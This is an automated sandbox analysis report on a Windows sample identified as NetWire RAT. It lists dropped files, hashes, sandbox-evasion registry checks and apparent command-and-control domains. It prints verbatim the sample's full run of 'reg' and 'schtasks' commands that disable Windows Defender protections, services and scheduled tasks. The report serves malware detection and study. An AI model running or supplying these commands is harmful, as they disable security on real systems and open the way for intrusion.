Analysis Overview
SHA256
00bdd3b2ccc6b339809704a8b12920327b76e6cdd9d0d1beddc38155a4532579
Threat Level: Known bad
The file 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Modifies security service
NetWire RAT payload
Modifies Windows Defender DisableAntiSpyware settings
Netwire family
Netwire
Looks for VirtualBox Guest Additions in registry
Looks for VMWare Tools registry key
Executes dropped EXE
Checks computer location settings
Checks BIOS information in registry
Loads dropped DLL
Maps connected drives based on registry
Modifies Security services
Suspicious use of SetThreadContext
Enumerates physical storage devices
Unsigned PE
System Location Discovery: System Language Discovery
NSIS installer
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Scheduled Task/Job: Scheduled Task
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-04-20 01:09
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2025-04-20 01:09
Reported
2025-04-20 01:12
Platform
win11-20250410-en
Max time kernel
1s
Max time network
133s
Command Line
Signatures
NetWire RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Netwire
Netwire family
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\WinDriversQt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\WinDriversQt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\WinDriversQt.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe"
C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
"C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"
C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
"C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe"
C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe
"C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B14E.tmp\B14F.tmp\B150.bat C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"
C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe
"C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe"
C:\Users\Admin\AppData\Roaming\nb662-full.exe
"C:\Users\Admin\AppData\Roaming\nb662-full.exe"
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SDgtKxxeaGYFg" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7F10.tmp"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DiFGHpZsWh" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7F0E.tmp"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yBrhLIdmRX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7F0F.tmp"
C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe
"{path}"
C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
"{path}"
C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe
"{path}"
C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
"{path}"
C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
"{path}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | maelus.mine.nu | udp |
| US | 8.8.8.8:53 | victoire.dyndns.biz | udp |
Files
C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
| MD5 | 279205de551b3053fc8b973150577120 |
| SHA1 | 8a78379b3af83ac4f2b1b07b7f968e2db7d1ea0b |
| SHA256 | 1d4070b3c282670191d1c5236ccad902e44e33a4d3211488eb52cd4e5223b159 |
| SHA512 | 29664cb6ff47e5b0016076f7a3c248ed1deb90150669a4cc7357b7a190bd348372f551a652f92c459190ad479ed646cb7be465c389d039d74c5acb3eb254487b |
C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
| MD5 | 9de85017f17de5b5872d27c4f66ca576 |
| SHA1 | abb2c3c99e58e498241f3c5b149821b79dbd1f21 |
| SHA256 | 0771ac3786c447e25abdbbfd18f67b5c25405a4266add5a227c1d69ff5048ce0 |
| SHA512 | 1265ab52ae96a97372316e2c0f1e8d648d0de7721d80a48340fb991038b6ffba640602d8592cffaa614db9b4f844b69e1d2988049a117631fe755d55759310e5 |
C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe
| MD5 | a5cc020492b0db504a7df2dbfed86cd1 |
| SHA1 | 11fb92cd5b25dfd3a02220286f49d426b3f9d003 |
| SHA256 | e98a538725d3864aff69872345f950c572d4b4b727e7c916c0de37e813dbc03d |
| SHA512 | ac69d9d6d0bc8cd632356b0c9bbc6eac6a91f6ab3ff7b3d1cbcdd5ff86cb0414643e251d2e6893afd614336c056914a815c2114b0fbc685f4a2fa780af1b0115 |
C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe
| MD5 | 6c18cac0ed1782d322f237f060c4f07d |
| SHA1 | fee4ecc2fc6c2189a81486bfa2d1a8a182100671 |
| SHA256 | 6443b61c3f5404dbcd4538e7636a9b1d4b6e5b07f38d95fd9a7794f7f30934e2 |
| SHA512 | 693d607ee51aec95d070fdc52f9ceb6716b6d36cb89184b67394cdca53c4afa9ca8bff761d39cf4290cf24ceaf5542f1868c029ed56341e92f46b9553c8899d9 |
C:\Users\Admin\AppData\Roaming\nb662-full.exe
| MD5 | 2ea0aa5b989197690e73372dc23ae796 |
| SHA1 | 497d114039585271b89fe954cea473fe32f33772 |
| SHA256 | 16c723380e74451ae1e7ca45c4abbc4773d4da194f92817d72ffaaa3da5f66f4 |
| SHA512 | 20ce64434a4cb0a806216e2647d67167a0c953e23d9ac2f8cfb80bf2c4638271d861463c802af156621a28a5c5d78e1b15c616b2e9ee2189bffeff5f7d25541d |
memory/4192-57-0x0000000072D80000-0x0000000073531000-memory.dmp
memory/1300-59-0x00000000056C0000-0x0000000005752000-memory.dmp
memory/3368-58-0x0000000004F70000-0x0000000005516000-memory.dmp
memory/4192-63-0x0000000004FA0000-0x0000000004FAA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\cpudesc.dll
| MD5 | d25102051b33f61c9f7fb564a4556219 |
| SHA1 | c683964c11d5175171bd009cb08f87592c923f85 |
| SHA256 | e58e5d1d8da2ea526d0d754b4faad3773021166b0720723efb7b30f1f5075398 |
| SHA512 | 8828eec31926251d7e51b5bf1050c3519c9b7fca4f978fb6ee0bf18f9642c3460687f10ff79e5892100ecadbf49725711567c348e1dfccb3644bd9ef992a92f0 |
C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\System.dll
| MD5 | 6f5257c0b8c0ef4d440f4f4fce85fb1b |
| SHA1 | b6ac111dfb0d1fc75ad09c56bde7830232395785 |
| SHA256 | b7ccb923387cc346731471b20fc3df1ead13ec8c2e3147353c71bb0bd59bc8b1 |
| SHA512 | a3cc27f1efb52fb8ecda54a7c36ada39cefeabb7b16f2112303ea463b0e1a4d745198d413eebb3551e012c84a20dcdf4359e511e51bc3f1a60b13f1e3bad1aa8 |
memory/3368-96-0x0000000004F10000-0x0000000004F2C000-memory.dmp
memory/1300-97-0x0000000005BD0000-0x0000000005C6C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\LangDLL.dll
| MD5 | ebd0da54db9f12ffd15206cc24355793 |
| SHA1 | 910be3bebdde55eb1ce05915a79f01ebdc622786 |
| SHA256 | 4066a0cbd9f6bb13c0f6fb064d4647ef7bc68a1be3d0caa4460b5ffd9ed1e0e6 |
| SHA512 | cee09db96267b1a30477ff074988606bdf35f9a5aa798a9a10029b11c0c347ab42a124320d777acde458828954cc8cf1a489b1673b31d589cdc4f50d4b86659d |
C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\UserInfo.dll
| MD5 | 8ef0e4eb7c89cdd2b552de746f5e2a53 |
| SHA1 | 820f681e7cec409a02b194a487d1c8af1038acf0 |
| SHA256 | 41293b9f6588e0fbdc8fcf2a9bd8e2b244cd5ff038fc13033378da337219c9dc |
| SHA512 | a68533e8a19637d0d44219549b24baba0dc4824424842f125600fda3edcafc4bb6bb340d57a00815f262d82373b440d58d6e4e5b2ceb29bb3f6bc4cbde66c3c5 |
memory/4192-72-0x0000000006080000-0x00000000065AC000-memory.dmp
memory/4192-56-0x0000000000510000-0x000000000064A000-memory.dmp
memory/3368-55-0x0000000000020000-0x000000000015A000-memory.dmp
memory/1300-54-0x0000000000C20000-0x0000000000D5C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\B14E.tmp\B14F.tmp\B150.bat
| MD5 | 665f21a9b6730aa08e62473e481b8c55 |
| SHA1 | 717d52e75ac16bf032299828dd61c86af281eb43 |
| SHA256 | dcaba420b47b5527bd3761ae8a2b76bbbf387100613b7c2f256cfe9ec58fb579 |
| SHA512 | b3c6fe2555613f4f7b30ba434e94421c397008a999ff5c07b5df349c550ef6b4d2a8b831208ad3bb25998bf9d2fe0dbb86414ef23ef9216211ab96373d9b6f1e |
memory/1300-45-0x0000000072D8E000-0x0000000072D8F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\nsDialogs.dll
| MD5 | d9256d9acaecabb20b7e9a1595abfa36 |
| SHA1 | ece1cab181dac7729246da1d4494b8daa10c3b70 |
| SHA256 | d7b2c55977a541f8d075e48d4e0a82eec79ad247b0ed168c19a8518131acd19c |
| SHA512 | 5827cdbfde0e766d1b74ecb22f9614232031da41c21d0f6ff6c9d5dcdfc0adc23e8fd616eb020ab42208932444b5e0cb1e6d6e698bead412eae19624a180b6ff |
C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\UAC.dll
| MD5 | 4814167aa1c7ec892e84907094646faa |
| SHA1 | a57a5ecbdfa9a8777a3c587f1acb02b783afc5ee |
| SHA256 | 32dd7269abf5a0e5db888e307d9df313e87cef4f1b597965a9d8e00934658822 |
| SHA512 | fb1f35e393997ecd2301f371892b59574ee6b666095c3a435336160481f6ef7ed5635c90ce5d2cf88e5ef4a5affb46cb841b7d17e7981bd6e998531193f5d067 |
memory/4192-114-0x0000000072D80000-0x0000000073531000-memory.dmp
memory/4192-117-0x00000000066B0000-0x00000000066FC000-memory.dmp
memory/1300-116-0x0000000006D90000-0x0000000006DDC000-memory.dmp
memory/3368-115-0x0000000006200000-0x000000000624C000-memory.dmp
memory/3368-118-0x00000000062C0000-0x0000000006326000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp7F0F.tmp
| MD5 | 208344347dd6b0c54f85e66f6aa78480 |
| SHA1 | b72f81b8ad0f85e752a57a053eb21a05aadb822c |
| SHA256 | 347401de3cfacbbbc16d84ae0f9bdab13166e1ea0abd554fe158a025d18c7613 |
| SHA512 | 2295c8fba889be0bdd155e30716d3b254642453291bcc74d6c50b663b052a2a86e369977342c3975700b0de0c3de7f956b8364812f47bc0966f5e35d3ca14906 |
C:\Users\Admin\AppData\Local\Temp\tmp7F10.tmp
| MD5 | 6505475046c7ce0540dc2625534a035b |
| SHA1 | 1c7cfd290c88c9876b4a2230bfb15981f53d11fe |
| SHA256 | 2dc1c2039d706fb941b02f5854e2c3b9453d1910c9d4e90470cd6289ef35c8e5 |
| SHA512 | 3ab4e6e39b6cb2a5ec7f4192c185fffa35f1db827ce6fb41f0764e957c8bc931bc9c9e18267aac9a3f464eff120c2086442c61cf827e8e9504b48fa96693374c |
C:\Users\Admin\AppData\Local\Temp\tmp7F0E.tmp
| MD5 | 99757558dcf54d4ef129f8ce06ab0abc |
| SHA1 | 87a512fd9f09a5333b7edbfbc4525ece25f457f3 |
| SHA256 | 09629e136aa57495f07732c5cd5e3e04eb9244e2b16d8d6478bc7153a7ae3fd8 |
| SHA512 | bf7240d5369b09789a768f8653c6c0ec49b2d3bbc2548b00f0476fa0ce4b33ad3b262e849ee03e25f73202069fd3eea74f13c1f5e8110e206d896ac8bafefdf3 |
memory/2708-141-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2708-139-0x0000000000400000-0x0000000000425000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\GetFLE.ini
| MD5 | 21533b9e9b48512d41f4766286d9f54c |
| SHA1 | df97ece7c973ebbbf8a10b5ca60aac70e6359540 |
| SHA256 | d8c83f60e0b10b9a681336aa2c6776038c9d3f1ca2454e5bb7798a5bdbca4971 |
| SHA512 | 40327c0b570c039df00d9bbe7d0fd7c8cf8e7376d3b637545b687aa1c53e23e88d8673a9a1ab50e9dbc59ff31921abc3e45de55063c6f5c5af3d2c9b2a9f9d44 |
C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\InstallOptions.dll
| MD5 | 2a03c4a7ac5ee5e0e0a683949f70971b |
| SHA1 | 3bd9877caaea4804c0400420494ad1143179dcec |
| SHA256 | d4f0042d8e7622b7e14395e926dd02edab3cdc77e82d88108b67a4d2cee9229b |
| SHA512 | 1942cdb522859f8dba46824786e361794a62e6201279201e1e0e2e07499fb6252933c5661782fccd77291c3650cafb2a7a08eee5431c8238f0da44840ee4c476 |
memory/4192-137-0x0000000072D80000-0x0000000073531000-memory.dmp
memory/3516-134-0x0000000000400000-0x0000000000425000-memory.dmp
memory/3516-132-0x0000000000400000-0x0000000000425000-memory.dmp
memory/876-130-0x0000000000400000-0x0000000000425000-memory.dmp
memory/876-128-0x0000000000400000-0x0000000000425000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2025-04-20 01:09
Reported
2025-04-20 01:12
Platform
win10v2004-20250314-en
Max time kernel
131s
Max time network
135s
Command Line
Signatures
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
NetWire RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Netwire
Netwire family
Looks for VirtualBox Guest Additions in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
Looks for VMWare Tools registry key
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\WinDriversQt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
Modifies Security services
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" | C:\Windows\system32\reg.exe | N/A |
